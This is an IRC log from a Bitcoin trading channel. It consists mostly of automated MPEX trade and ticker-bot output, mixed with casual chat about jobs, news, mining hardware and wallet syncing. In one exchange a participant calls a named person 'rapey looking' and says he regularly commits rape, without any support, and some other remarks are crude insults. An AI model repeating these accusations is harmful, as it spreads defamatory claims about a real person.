Jan 10 03:42:16 [MPEX] [S.DICE] 500 @ 0.00469395 = 2.347 BTC [-] Jan 10 03:42:25 lmao Jan 10 03:48:53 [MPEX] [S.DICE] 1275 @ 0.00469395 = 5.9848 BTC [-] Jan 10 03:48:54 [MPEX] [S.DICE] 1700 @ 0.00468978 = 7.9726 BTC [-] Jan 10 03:48:56 [MPEX] [S.DICE] 25 @ 0.00467679 = 0.1169 BTC [-] Jan 10 03:53:36 [MPEX] [S.DICE] 1650 @ 0.00479729 = 7.9155 BTC [+] Jan 10 03:55:04 I just calmly told old employer they didnt value me enough Jan 10 03:56:26 they said ok and did nothing for another couple of months, so I calmly resigned. They shat brix, offered a decent retention package but no real improvement Jan 10 03:56:45 so I left and got hired immediately by a customer for a shitload more Jan 10 03:58:06 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.29995139 = 299.9514 BTC [+] Jan 10 03:58:08 [MPEX] [O.BTCUSD.C120T] 1 @ 0.19693531 BTC [+] Jan 10 03:58:09 [MPEX] [O.BTCUSD.C120T] 999 @ 0.2416106 = 241.369 BTC [+] Jan 10 03:58:29 i've never been employed. Jan 10 04:02:49 its not all bad, the old job I worked from home 90% of the time and since home is near the beach I 'worked' from the beach a fair bit Jan 10 04:03:52 have run own business before and that wasnt much fun Jan 10 04:08:08 i like it. Jan 10 04:08:53 runing your own biz = self employed Jan 10 04:08:55 [MPEX] [S.DICE] 1150 @ 0.00467679 = 5.3783 BTC [-] Jan 10 04:12:59 nah Jan 10 04:13:02 i just employ others. Jan 10 04:13:21 [MPEX] [S.DICE] 2025 @ 0.00467679 = 9.4705 BTC [-] Jan 10 04:17:02 [MPEX] [S.DICE] 625 @ 0.00467652 = 2.9228 BTC [-] Jan 10 04:22:52 [MPEX] [S.DICE] 500 @ 0.00476977 = 2.3849 BTC [+] Jan 10 04:22:54 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.24148842 = 241.4884 BTC [-] Jan 10 04:23:20 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.29984697 = 299.847 BTC [-] Jan 10 04:31:03 [MPEX] [S.DICE] 1300 @ 0.0047285 = 6.1471 BTC [-] Jan 10 04:31:04 [MPEX] [S.DICE] 1200 @ 0.00476977 = 5.7237 BTC [+] Jan 10 04:36:41 [MPEX] [S.DICE] 549 @ 0.00472827 = 2.5958 BTC [-] Jan 10 04:36:42 [MPEX] [S.DICE] 2451 @ 0.00467399 = 11.4559 BTC [-] Jan 10 04:47:30 [MPEX] [S.DICE] 2213 @ 0.00476486 = 10.5446 BTC [+] Jan 10 04:55:05 [MPEX] [S.DICE] 1085 @ 0.00469672 = 5.0959 BTC [-] Jan 10 05:08:43 [MPEX] [S.DICE] 1172 @ 0.00472033 = 5.5322 BTC [+] Jan 10 05:08:45 [MPEX] [S.DICE] 87 @ 0.00476486 = 0.4145 BTC [+] Jan 10 05:08:46 [MPEX] [S.DICE] 141 @ 0.00479139 = 0.6756 BTC [+] Jan 10 05:11:42 http://www.foxnews.com/opinion/2013/01/08/are-raising-generation-deluded-narcissists/ Jan 10 05:11:43 heh Jan 10 05:11:53 dude stop reading fox Jan 10 05:13:45 [MPEX] [S.DICE] 1100 @ 0.00479139 = 5.2705 BTC [+] Jan 10 05:14:07 next you'll be linking infowars Jan 10 05:14:12 haha i think i already have Jan 10 05:18:13 what's wrong with fox anyway ? Jan 10 05:19:49 its the stupid network Jan 10 05:20:35 another religion for banjo playing hillbillies Jan 10 05:21:41 [MPEX] [S.DICE] 15 @ 0.00469672 = 0.0705 BTC [-] Jan 10 05:21:43 [MPEX] [S.DICE] 299 @ 0.00467399 = 1.3975 BTC [-] Jan 10 05:21:44 [MPEX] [S.DICE] 754 @ 0.00466988 = 3.5211 BTC [-] Jan 10 05:21:45 [MPEX] [S.DICE] 825 @ 0.0046657 = 3.8492 BTC [-] Jan 10 05:21:46 [MPEX] [S.DICE] 657 @ 0.00466144 = 3.0626 BTC [-] Jan 10 05:29:34 [MPEX] [S.DICE] 643 @ 0.00466144 = 2.9973 BTC [-] Jan 10 05:29:35 [MPEX] [S.DICE] 457 @ 0.00465261 = 2.1262 BTC [-] Jan 10 05:31:35 A new analysis of the American Freshman Survey, which has accumulated data for the past 47 years from 9 million young adults, reveals that college students are more likely than ever to call themselves gifted and driven to succeed, even though their test scores and time spent studying are decreasing. Jan 10 05:31:39 seems spot on to me. Jan 10 05:37:31 !ticker Jan 10 05:37:32 Provide exchange and ticker. Jan 10 05:37:36 !ticker m Jan 10 05:37:36 Provide exchange and ticker. Jan 10 05:37:38 [MPEX] [S.DICE] 59 @ 0.00479139 = 0.2827 BTC [+] Jan 10 05:37:39 [MPEX] [S.DICE] 1391 @ 0.00479569 = 6.6708 BTC [+] Jan 10 05:38:22 !ticker m s.dice Jan 10 05:38:24 [MPEX:S.DICE] 1D: 0.00459207 / 0.00473849 / 0.0048 (298121 shares, 1,412.65 BTC), 1W: 0.00353735 / 0.00430793 / 0.0048 (2130686 shares, 9,178.86 BTC), 1M: 0.0014 / 0.00342682 / 0.0048 (14196612 shares, 48,649.34 BTC) Jan 10 05:38:30 !ticker h sdice Jan 10 05:38:32 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483246445498 / 0.50000000 (422 shares, 203.93000000 BTC), 1W: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), 1M: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), Jan 10 05:38:41 theryago Jan 10 05:39:04 you can use H or HL or HAVELOCK / M or MP or MPEX Jan 10 05:39:24 !ticker x sdice Jan 10 05:39:27 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483246445498 / 0.50000000 (422 shares, 203.93000000 BTC), 1W: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), 1M: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), Jan 10 05:39:33 wat Jan 10 05:39:46 !ticker wat wat Jan 10 05:39:48 Shit Tyrone, get it together! Jan 10 05:39:49 !ticker x wat Jan 10 05:39:52 Shit Tyrone, get it together! Jan 10 05:40:07 lol Jan 10 05:40:31 !ticker a sdice Jan 10 05:40:33 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483246445498 / 0.50000000 (422 shares, 203.93000000 BTC), 1W: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), 1M: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), Jan 10 05:40:43 !ticker hl s.dice Jan 10 05:40:46 [MPEX:S.DICE] 1D: 0.00459207 / 0.00473849 / 0.0048 (298121 shares, 1,412.65 BTC), 1W: 0.00353735 / 0.00430793 / 0.0048 (2130686 shares, 9,178.86 BTC), 1M: 0.0014 / 0.00342682 / 0.0048 (14196612 shares, 48,649.34 BTC) Jan 10 05:40:53 it does wordmatching huh Jan 10 05:41:06 well Jan 10 05:41:13 at this point it only tries Jan 10 05:41:14 and fails Jan 10 05:41:16 lol Jan 10 05:41:28 i dont test this shit Jan 10 05:41:34 i just input some code and give it a go Jan 10 05:41:37 see if it blows Jan 10 05:41:41 that's called testing Jan 10 05:41:52 1d 7d 30d Jan 10 05:41:52 live testing i guess :) Jan 10 05:41:58 would be moar reasonable than 1W Jan 10 05:42:06 1w is shorter Jan 10 05:42:12 but mkay ill flip back to 7d Jan 10 05:42:14 ya but nobody uses W and M in English Jan 10 05:42:28 i do Jan 10 05:42:43 "This data is not unexpected. I have been writing a great deal over the past few years about the toxic psychological impact of media and technology on children, adolescents and young adults, particularly as it regards turning them into faux celebrities—the equivalent of lead actors in their own fictionalized life stories." Jan 10 05:42:45 dub ^^ Jan 10 05:42:48 hate on fox some moar. Jan 10 05:43:42 fox is not responsible for that Jan 10 05:44:44 they are just reporting subject matter that is relevant to their ageing hillbilly audience Jan 10 05:44:58 such as me. Jan 10 05:45:31 that guy, who incidentelly looks more like a rapist than any other person I have laid eyes on, has a point though Jan 10 05:45:55 aha. Jan 10 05:46:15 even the notion that someone looks like a rapist is a product of this imbecilic outgrowth of pop culture. Jan 10 05:46:36 !ticker h sdice Jan 10 05:46:38 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483246445498 / 0.50000000 (422 shares, 203.93000000 BTC), 1W: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), 1M: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), Jan 10 05:46:43 !ticker hl sdice Jan 10 05:46:45 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483246445498 / 0.50000000 (422 shares, 203.93000000 BTC), 1W: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), 1M: 0.37000000 / 0.447561927377 / 0.62000000 (2947 shares, 1318.96499998 BTC), Jan 10 05:46:46 bullshit Jan 10 05:46:49 !ticker x sdice Jan 10 05:46:50 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 10 05:46:56 lol Jan 10 05:47:24 people look like rapists because they are probably rapists Jan 10 05:47:25 ah the timestamps damn Jan 10 05:47:27 one sec Jan 10 05:47:40 take Luke-Jr Jan 10 05:47:48 dub that's just a rehash of frenology, a thoroughly discredited load of bunk Jan 10 05:47:59 one rapey looking motherfucker Jan 10 05:48:04 much like all the rest of kitsch-art, pseudo-science and fake exotism that makes up the pop. Jan 10 05:48:08 !ticker m s.dice Jan 10 05:48:10 [MPEX:S.DICE] 1D: 0.00459207 / 0.0047387 / 0.0048 (299349 shares, 1,418.53 BTC), 7D: 0.00353735 / 0.0043083 / 0.0048 (2132486 shares, 9,187.41 BTC), 30D: 0.0014 / 0.00342699 / 0.0048 (14198412 shares, 48,657.89 BTC) Jan 10 05:48:16 who incidentlayy commits what most civilised people would call rape on a regular basis Jan 10 05:48:29 [MPEX] [S.DICE] 1800 @ 0.00474875 = 8.5478 BTC [-] Jan 10 05:49:11 ok so thats that Jan 10 05:49:15 next is burnside Jan 10 05:56:07 [MPEX] [S.DICE] 900 @ 0.00469603 = 4.2264 BTC [-] Jan 10 05:56:40 [MPEX] [S.DICE] 1350 @ 0.00469603 = 6.3396 BTC [-] Jan 10 05:56:41 [MPEX] [S.DICE] 200 @ 0.00468597 = 0.9372 BTC [-] Jan 10 05:56:54 Ukto still sore over twatter? Jan 10 06:00:05 something like that Jan 10 06:00:22 Confirmed total: 300 BTC Jan 10 06:00:23 eee Jan 10 06:09:33 [MPEX] [S.DICE] 400 @ 0.00468622 = 1.8745 BTC [+] Jan 10 06:15:02 oh good, they are working on something, http://mineforeman.com/2013/01/09/butterfly-labs-unveils-native-android-mining-platform/ Jan 10 06:19:52 !ticker bt ltc-mining Jan 10 06:19:54 [BTCT:LTC-MINING] 1D: 0.4399 / 0.44 / 0.44 ( shares, BTC), 7D: na / 0.44 / na Jan 10 06:20:01 righto. Jan 10 06:20:10 is wat we get for nao Jan 10 06:20:40 hm Jan 10 06:22:29 pigeons im so glad i didn't list any of them asic ppls. Jan 10 06:22:41 !ticker bt COGNITIVE Jan 10 06:22:44 [BTCT:COGNITIVE] 1D: 0.41 / 0.4366 / 0.4977D: na / 0.49 / na Jan 10 06:23:17 fucking undefensible strategic choice that pays out in the end. Jan 10 06:24:07 shees finally Jan 10 06:31:08 fuckin typos. Jan 10 06:41:51 pigeons: more like butthurt Jan 10 06:42:06 :P Jan 10 06:48:26 [MPEX] [S.DICE] 1300 @ 0.00468622 = 6.0921 BTC [+] Jan 10 06:53:25 there really should be more drama Jan 10 06:53:31 price is going to collapse atthis rate. Jan 10 06:55:29 mp: wanna do an exchange war? Jan 10 06:55:30 :P Jan 10 06:55:36 call each other names in public Jan 10 06:55:40 lol Jan 10 06:55:41 slapstick etc Jan 10 06:55:51 make funny images about each other Jan 10 06:55:55 https://bitcointalk.org/index.php?topic=135574.0 Jan 10 06:55:57 working at it. Jan 10 06:56:13 until someone posts a pic of us out drinking together @ the strip club Jan 10 06:56:13 :PO Jan 10 06:56:57 at my strip club ? Jan 10 06:57:18 u dont like nekid women? Jan 10 06:58:15 sure i do. Jan 10 06:58:26 them lets gp Jan 10 06:58:27 go Jan 10 06:58:54 is it degrading to enjoy fine art there? Jan 10 06:59:42 go where lol Jan 10 06:59:54 strip club :P Jan 10 07:00:08 BREAKING : Josh found a crate of old high end ASICs by the grocery shop parking lot Jan 10 07:00:19 LOL Jan 10 07:00:21 BFL will be delivering boards with sanded off chips soon. Jan 10 07:00:42 lol Jan 10 07:03:48 [MPEX] [S.DICE] 400 @ 0.00469907 = 1.8796 BTC [+] Jan 10 07:08:45 dss bressert, mt4 vs mt5 http://shrani.si/f/2a/UZ/1qD6WtgS/mt4mt5dss.png Jan 10 07:08:49 fucked up. Jan 10 07:15:41 strip club? Jan 10 07:23:40 [MPEX] [S.DICE] 153 @ 0.00469565 = 0.7184 BTC [-] Jan 10 07:25:42 [MPEX] [S.MPOE] 16601 @ 0.00065675 = 10.9027 BTC [-] Jan 10 07:29:46 [MPEX] [S.DICE] 200 @ 0.00468622 = 0.9372 BTC [-] Jan 10 07:29:47 [MPEX] [S.DICE] 1000 @ 0.00468598 = 4.686 BTC [-] Jan 10 07:29:49 [MPEX] [S.DICE] 800 @ 0.00468597 = 3.7488 BTC [-] Jan 10 07:39:52 [MPEX] [S.DICE] 600 @ 0.00468597 = 2.8116 BTC [-] Jan 10 07:46:06 [MPEX] [S.DICE] 443 @ 0.00465261 = 2.0611 BTC [-] Jan 10 07:46:07 [MPEX] [S.DICE] 300 @ 0.00465197 = 1.3956 BTC [-] Jan 10 07:46:09 [MPEX] [S.DICE] 807 @ 0.00465182 = 3.754 BTC [-] Jan 10 07:50:33 [MPEX] [S.DICE] 157 @ 0.00465182 = 0.7303 BTC [-] Jan 10 07:50:34 [MPEX] [S.DICE] 943 @ 0.00465051 = 4.3854 BTC [-] Jan 10 08:09:24 [MPEX] [S.DICE] 2350 @ 0.00467064 = 10.976 BTC [+] Jan 10 08:09:26 [MPEX] [S.DICE] 450 @ 0.00468243 = 2.1071 BTC [+] Jan 10 08:12:29 [MPEX] [S.DICE] 2750 @ 0.00468243 = 12.8767 BTC [+] Jan 10 08:12:31 [MPEX] [S.DICE] 750 @ 0.00469414 = 3.5206 BTC [+] Jan 10 08:12:32 [MPEX] [S.DICE] 597 @ 0.00469565 = 2.8033 BTC [+] Jan 10 08:12:33 [MPEX] [S.DICE] 498 @ 0.00469907 = 2.3401 BTC [+] Jan 10 08:12:34 [MPEX] [S.DICE] 1068 @ 0.00470391 = 5.0238 BTC [+] Jan 10 08:17:35 [MPEX] [S.DICE] 1600 @ 0.00465051 = 7.4408 BTC [-] Jan 10 08:19:10 [MPEX] [S.DICE] 557 @ 0.00465051 = 2.5903 BTC [-] Jan 10 08:19:12 [MPEX] [S.DICE] 358 @ 0.00465038 = 1.6648 BTC [-] Jan 10 08:19:12 [MPEX] [S.DICE] 1900 @ 0.00464902 = 8.8331 BTC [-] Jan 10 08:19:13 [MPEX] [S.DICE] 535 @ 0.00464584 = 2.4855 BTC [-] Jan 10 08:21:46 kakobrekla you own bitbet right? Jan 10 08:22:00 only half! Jan 10 08:22:33 hehe cool, just got a silly idea Jan 10 08:25:02 [MPEX] [S.MPOE] 15200 @ 0.00064067 = 9.7382 BTC [-] Jan 10 08:31:36 [MPEX] [S.MPOE] 11900 @ 0.00065021 = 7.7375 BTC [+] Jan 10 08:31:36 [MPEX] [S.MPOE] 1416 @ 0.00063363 = 0.8972 BTC [-] Jan 10 08:33:10 o ya ? are you buying it ? :D Jan 10 08:33:58 nope, just a stupid idea :P Jan 10 08:34:38 [MPEX] [S.DICE] 1692 @ 0.00465337 = 7.8735 BTC [+] Jan 10 08:34:39 [MPEX] [S.DICE] 477 @ 0.00464584 = 2.2161 BTC [-] Jan 10 08:34:40 [MPEX] [S.DICE] 16 @ 0.00464552 = 0.0743 BTC [-] Jan 10 08:39:28 o i c Jan 10 08:51:47 [MPEX] [S.DICE] 750 @ 0.00468668 = 3.515 BTC [+] Jan 10 09:00:13 [MPEX] [S.MPOE] 15744 @ 0.00065675 = 10.3399 BTC [+] Jan 10 09:06:52 [MPEX] [S.DICE] 450 @ 0.00468668 = 2.109 BTC [+] Jan 10 09:06:54 [MPEX] [S.DICE] 132 @ 0.00470391 = 0.6209 BTC [+] Jan 10 09:06:55 [MPEX] [S.DICE] 718 @ 0.00473944 = 3.4029 BTC [+] Jan 10 09:31:22 [MPEX] [S.DICE] 1000 @ 0.00468724 = 4.6872 BTC [-] Jan 10 09:43:45 [MPEX] [S.DICE] 400 @ 0.00472331 = 1.8893 BTC [+] Jan 10 10:04:18 [MPEX] [S.DICE] 1600 @ 0.00467892 = 7.4863 BTC [-] Jan 10 10:04:19 [MPEX] [S.DICE] 1200 @ 0.00466683 = 5.6002 BTC [-] Jan 10 10:04:21 [MPEX] [S.DICE] 1334 @ 0.00464552 = 6.1971 BTC [-] Jan 10 10:10:29 [MPEX] [S.DICE] 200 @ 0.00463933 = 0.9279 BTC [-] Jan 10 10:10:31 [MPEX] [S.DICE] 100 @ 0.00463903 = 0.4639 BTC [-] Jan 10 10:15:31 [MPEX] [S.DICE] 1350 @ 0.00463903 = 6.2627 BTC [-] Jan 10 10:19:29 [MPEX] [S.DICE] 1100 @ 0.00464125 = 5.1054 BTC [+] Jan 10 10:27:03 [MPEX] [S.DICE] 1400 @ 0.00463903 = 6.4946 BTC [-] Jan 10 10:27:05 [MPEX] [S.DICE] 1650 @ 0.00463434 = 7.6467 BTC [-] Jan 10 10:27:06 [MPEX] [S.DICE] 50 @ 0.00462257 = 0.2311 BTC [-] Jan 10 10:34:31 [MPEX] [S.DICE] 123 @ 0.00464125 = 0.5709 BTC [+] Jan 10 10:34:33 [MPEX] [S.DICE] 550 @ 0.00464214 = 2.5532 BTC [+] Jan 10 10:34:34 [MPEX] [S.DICE] 206 @ 0.00464409 = 0.9567 BTC [+] Jan 10 10:36:55 [MPEX] [S.DICE] 1841 @ 0.00464409 = 8.5498 BTC [+] Jan 10 10:40:38 [MPEX] [S.DICE] 500 @ 0.00462257 = 2.3113 BTC [-] Jan 10 10:40:39 [MPEX] [S.DICE] 82 @ 0.00462029 = 0.3789 BTC [-] Jan 10 10:43:25 WTS ASUS M4A87TD/USB3 + Athlon II X3 445 + 8 GB RAM + 320 GB HD + EXTRAS for $200 on PayPal or 14 Bitcoins or 2500 Litecoins Jan 10 10:45:23 lmiot Jan 10 10:46:05 lmiot? Jan 10 10:49:17 [MPEX] [S.DICE] 750 @ 0.00462029 = 3.4652 BTC [-] Jan 10 10:53:30 [MPEX] [S.DICE] 2650 @ 0.00464409 = 12.3068 BTC [+] Jan 10 11:03:24 [MPEX] [S.DICE] 769 @ 0.00464409 = 3.5713 BTC [+] Jan 10 11:03:25 [MPEX] [S.DICE] 180 @ 0.00468482 = 0.8433 BTC [+] Jan 10 11:29:10 [MPEX] [S.DICE] 318 @ 0.00462029 = 1.4693 BTC [-] Jan 10 11:29:12 [MPEX] [S.DICE] 182 @ 0.00461504 = 0.8399 BTC [-] Jan 10 11:36:59 [MPEX] [S.DICE] 1150 @ 0.00461504 = 5.3073 BTC [-] Jan 10 11:43:37 [MPEX] [S.DICE] 320 @ 0.00468482 = 1.4991 BTC [+] Jan 10 11:49:23 Hey guys, anybody know where I can buy pirate bonds? Jan 10 11:52:48 hilarious Jan 10 11:52:56 fuck sake the client is peice of shit Jan 10 11:54:03 Huh? Jan 10 11:54:15 bitcoin it sucks ass Jan 10 11:54:52 What's so bad about the client? Jan 10 11:54:54 [MPEX] [S.DICE] 512 @ 0.00469031 = 2.4014 BTC [+] Jan 10 11:55:17 its just eaten my fucking db Jan 10 11:55:30 so I have no bitcoins Jan 10 11:55:51 until I'm synced some time next week Jan 10 12:02:19 It doesn't take that long to get synched :P Jan 10 12:02:59 [MPEX] [S.DICE] 964 @ 0.00468718 = 4.5184 BTC [-] Jan 10 12:03:01 [MPEX] [S.DICE] 336 @ 0.00468096 = 1.5728 BTC [-] Jan 10 12:07:37 cool, stuck at "blocks" : 500, Jan 10 12:07:50 [MPEX] [S.DICE] 900 @ 0.00469031 = 4.2213 BTC [+] Jan 10 12:07:56 ;;bc,blocks Jan 10 12:07:56 215978 Jan 10 12:15:16 So, anybody knows where I can buy one of those pirate bonds? Jan 10 12:16:49 [MPEX] [S.DICE] 2639 @ 0.00468096 = 12.3531 BTC [-] Jan 10 12:20:37 Sertuerner why would you want pirate bonds? Jan 10 12:21:11 [MPEX] [S.DICE] 2200 @ 0.00461504 = 10.1531 BTC [-] Jan 10 12:24:16 [MPEX] [S.DICE] 411 @ 0.00465106 = 1.9116 BTC [+] Jan 10 12:24:18 [MPEX] [S.DICE] 1139 @ 0.00469031 = 5.3423 BTC [+] Jan 10 12:26:58 [MPEX] [S.DICE] 68 @ 0.00461504 = 0.3138 BTC [-] Jan 10 12:27:00 [MPEX] [S.DICE] 1282 @ 0.00461332 = 5.9143 BTC [-] Jan 10 12:37:09 [MPEX] [S.DICE] 1400 @ 0.00464627 = 6.5048 BTC [+] Jan 10 12:40:41 [MPEX] [S.DICE] 449 @ 0.00469031 = 2.1059 BTC [+] Jan 10 12:40:42 [MPEX] [S.DICE] 781 @ 0.00469234 = 3.6647 BTC [+] Jan 10 12:45:00 [MPEX] [S.DICE] 400 @ 0.00467639 = 1.8706 BTC [-] Jan 10 12:45:01 [MPEX] [S.DICE] 650 @ 0.00467276 = 3.0373 BTC [-] Jan 10 12:46:44 [MPEX] [S.MPOE] 18768 @ 0.00063363 = 11.892 BTC [-] Jan 10 12:46:45 [MPEX] [S.MPOE] 8700 @ 0.00063002 = 5.4812 BTC [-] Jan 10 12:46:47 [MPEX] [S.MPOE] 13032 @ 0.00063001 = 8.2103 BTC [-] Jan 10 12:52:59 [MPEX] [S.DICE] 554 @ 0.00469234 = 2.5996 BTC [+] Jan 10 12:53:00 [MPEX] [S.DICE] 1550 @ 0.00469362 = 7.2751 BTC [+] Jan 10 12:53:00 [MPEX] [S.DICE] 496 @ 0.00471599 = 2.3391 BTC [+] Jan 10 12:57:19 [MPEX] [S.DICE] 150 @ 0.00467276 = 0.7009 BTC [-] Jan 10 12:57:24 [MPEX] [S.DICE] 1538 @ 0.00463804 = 7.1333 BTC [-] Jan 10 12:57:24 [MPEX] [S.DICE] 1062 @ 0.00461516 = 4.9013 BTC [-] Jan 10 13:05:32 [MPEX] [S.DICE] 1154 @ 0.00471599 = 5.4423 BTC [+] Jan 10 13:05:33 [MPEX] [S.DICE] 1045 @ 0.00472252 = 4.935 BTC [+] Jan 10 13:20:58 [MPEX] [S.DICE] 2200 @ 0.00469515 = 10.3293 BTC [-] Jan 10 13:21:00 [MPEX] [S.DICE] 600 @ 0.00467818 = 2.8069 BTC [-] Jan 10 13:25:55 [MPEX] [S.DICE] 450 @ 0.00467818 = 2.1052 BTC [-] Jan 10 13:27:55 [MPEX] [S.DICE] 743 @ 0.00467818 = 3.4759 BTC [-] Jan 10 13:27:55 [MPEX] [S.DICE] 521 @ 0.00461516 = 2.4045 BTC [-] Jan 10 13:37:35 [MPEX] [S.DICE] 450 @ 0.00468816 = 2.1097 BTC [+] Jan 10 13:37:36 [MPEX] [S.DICE] 650 @ 0.00468098 = 3.0426 BTC [-] Jan 10 13:43:08 dub, get >0.7.2 go to https://bitcointalk.org/index.php?topic=117982.0;all ; get blockchain from torrent or from http://eu1.bitcoincharts.com/blockchain/ I think it only gets up to about 190000 or so, needing around 20000 blocks left to download Jan 10 13:43:43 more info > http://bitcoin.stackexchange.com/questions/3551/how-can-one-download-the-initial-blockchain-data-files-securely Jan 10 13:44:07 [MPEX] [S.DICE] 150 @ 0.00468098 = 0.7021 BTC [-] Jan 10 13:49:46 [MPEX] [S.DICE] 1650 @ 0.00462295 = 7.6279 BTC [-] Jan 10 13:49:48 [MPEX] [S.DICE] 302 @ 0.00472252 = 1.4262 BTC [+] Jan 10 13:49:49 [MPEX] [S.DICE] 495 @ 0.00473615 = 2.3444 BTC [+] Jan 10 13:49:50 [MPEX] [S.DICE] 782 @ 0.00473944 = 3.7062 BTC [+] Jan 10 13:49:50 [MPEX] [S.DICE] 321 @ 0.00474875 = 1.5243 BTC [+] Jan 10 13:56:39 [MPEX] [S.DICE] 779 @ 0.00474875 = 3.6993 BTC [+] Jan 10 14:01:42 [MPEX] [S.DICE] 1321 @ 0.00475012 = 6.2749 BTC [+] Jan 10 14:09:45 [MPEX] [S.DICE] 541 @ 0.0046903 = 2.5375 BTC [-] Jan 10 14:09:46 [MPEX] [S.DICE] 1808 @ 0.00475027 = 8.5885 BTC [+] Jan 10 14:36:06 [MPEX] [S.DICE] 1100 @ 0.00469833 = 5.1682 BTC [-] Jan 10 14:36:07 [MPEX] [S.DICE] 1250 @ 0.00465766 = 5.8221 BTC [-] Jan 10 14:40:04 [MPEX] [S.DICE] 530 @ 0.00465766 = 2.4686 BTC [-] Jan 10 14:40:06 [MPEX] [S.DICE] 720 @ 0.00461516 = 3.3229 BTC [-] Jan 10 14:44:23 [MPEX] [S.MPOE] 8968 @ 0.00063001 = 5.6499 BTC [-] Jan 10 14:44:24 [MPEX] [S.MPOE] 4910 @ 0.00063 = 3.0933 BTC [-] Jan 10 14:44:26 [MPEX] [S.MPOE] 510 @ 0.0006295 = 0.321 BTC [-] Jan 10 14:44:27 [MPEX] [S.MPOE] 400 @ 0.0006295 = 0.2518 BTC [-] Jan 10 14:44:28 [MPEX] [S.MPOE] 4000 @ 0.0006294 = 2.5176 BTC [-] Jan 10 14:44:29 [MPEX] [S.MPOE] 1500 @ 0.0006293 = 0.944 BTC [-] Jan 10 14:44:29 [MPEX] [S.MPOE] 28428 @ 0.00062927 = 17.8889 BTC [-] Jan 10 14:47:55 [MPEX] [S.MPOE] 17800 @ 0.00064292 = 11.444 BTC [+] Jan 10 14:56:26 [MPEX] [S.DICE] 383 @ 0.00461516 = 1.7676 BTC [-] Jan 10 14:56:27 [MPEX] [S.DICE] 1600 @ 0.00461435 = 7.383 BTC [-] Jan 10 14:56:28 [MPEX] [S.DICE] 617 @ 0.00461332 = 2.8464 BTC [-] Jan 10 15:07:44 [MPEX] [S.DICE] 21 @ 0.00461332 = 0.0969 BTC [-] Jan 10 15:07:45 [MPEX] [S.DICE] 1029 @ 0.00461329 = 4.7471 BTC [-] Jan 10 15:15:22 [MPEX] [S.DICE] 476 @ 0.00461329 = 2.1959 BTC [-] Jan 10 15:17:16 [MPEX] [S.DICE] 195 @ 0.00461329 = 0.8996 BTC [-] Jan 10 15:17:17 [MPEX] [S.DICE] 500 @ 0.00461321 = 2.3066 BTC [-] Jan 10 15:17:18 [MPEX] [S.DICE] 1286 @ 0.00461227 = 5.9314 BTC [-] Jan 10 15:17:19 [MPEX] [S.DICE] 1200 @ 0.00461194 = 5.5343 BTC [-] Jan 10 15:17:20 [MPEX] [S.DICE] 1628 @ 0.00461043 = 7.5058 BTC [-] Jan 10 15:17:21 [MPEX] [S.DICE] 941 @ 0.00460851 = 4.3366 BTC [-] Jan 10 15:23:10 ;;ticker Jan 10 15:23:11 BTCUSD ticker | Best bid: 13.87401, Best ask: 13.94994, Bid-ask spread: 0.07593, Last trade: 13.87350, 24 hour volume: 29908.71166561, 24 hour low: 13.65180, 24 hour high: 14.00000, 24 hour vwap: 13.85230 Jan 10 15:23:15 !ticker s.dice Jan 10 15:23:15 Provide exchange and ticker. Jan 10 15:23:25 !ticker S.DICE Jan 10 15:23:26 Provide exchange and ticker. Jan 10 15:23:33 !ticker MPEX S.DICE Jan 10 15:23:34 [MPEX:S.DICE] 1D: 0.00459207 / 0.0047097 / 0.0048 (287563 shares, 1,354.34 BTC), 7D: 0.00360414 / 0.00432982 / 0.0048 (2210634 shares, 9,571.67 BTC), 30D: 0.0014 / 0.00343545 / 0.0048 (14293412 shares, 49,104.41 BTC) Jan 10 15:23:52 [MPEX] [S.DICE] 450 @ 0.00463599 = 2.0862 BTC [+] Jan 10 15:26:48 is S.DICE PE around 7.4? Jan 10 15:27:59 is this high for something like that? Jan 10 15:31:06 [MPEX] [S.MPOE] 12700 @ 0.00065629 = 8.3349 BTC [+] Jan 10 15:31:18 azx: there isn't anything much to compare to Jan 10 15:34:04 [MPEX] [S.DICE] 1950 @ 0.00468492 = 9.1356 BTC [+] Jan 10 15:34:31 PE is still PE :) Jan 10 15:47:29 heh Jan 10 15:47:37 EskimoBob any idea what the original is? Jan 10 15:47:48 looks like a SNL sketch Jan 10 15:48:47 I think its a real swedish talkshow Jan 10 15:50:43 [MPEX] [S.MPOE] 2150 @ 0.00065473 = 1.4077 BTC [-] Jan 10 16:07:36 abracadabra: i think the original is about this guy's health problems or something like that Jan 10 16:11:10 [MPEX] [S.DICE] 1200 @ 0.00472984 = 5.6758 BTC [+] Jan 10 16:11:12 [MPEX] [S.DICE] 245 @ 0.00469116 = 1.1493 BTC [-] Jan 10 16:11:13 [MPEX] [S.DICE] 455 @ 0.00465313 = 2.1172 BTC [-] Jan 10 16:11:37 [MPEX] [S.DICE] 6095 @ 0.00465313 = 28.3608 BTC [-] Jan 10 16:13:40 [MPEX] [S.MPOE] 16150 @ 0.00062927 = 10.1627 BTC [-] Jan 10 16:16:21 [MPEX] [S.DICE] 59 @ 0.00460851 = 0.2719 BTC [-] Jan 10 16:16:23 [MPEX] [S.DICE] 791 @ 0.00460838 = 3.6452 BTC [-] Jan 10 16:37:59 [MPEX] [S.DICE] 350 @ 0.00461332 = 1.6147 BTC [+] Jan 10 16:38:42 [MPEX] [S.DICE] 921 @ 0.00469088 = 4.3203 BTC [+] Jan 10 16:40:32 [MPEX] [S.DICE] 1100 @ 0.00461332 = 5.0747 BTC [-] Jan 10 16:40:33 